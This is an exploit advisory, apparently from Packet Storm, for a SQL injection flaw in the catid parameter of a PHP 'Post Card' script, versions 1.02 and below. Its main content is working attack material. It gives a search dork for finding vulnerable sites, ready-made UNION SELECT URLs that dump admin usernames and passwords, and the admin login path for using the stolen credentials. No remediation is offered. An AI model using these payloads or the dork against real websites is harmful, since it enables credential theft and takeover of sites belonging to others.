Post Card versions 1.02 and below suffer from a remote SQL injection vulnerability.
89001fd3d2f7dc1df121d870aa8d38871d866fdaa031200b26c796cba036f531post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : darkangeL_G85@Yahoo.CoM
___________________________________
script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
DorK : inurl:choosecard.php?catid=
_____
ExploiT & Demo
_______
post Card v 1.01
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
post Card v 1.02
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--
Note : Exploit in Properties Picture
Login :
______
/admin
Greetz : All my freind
Im IraQi | Im TrYaGi
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed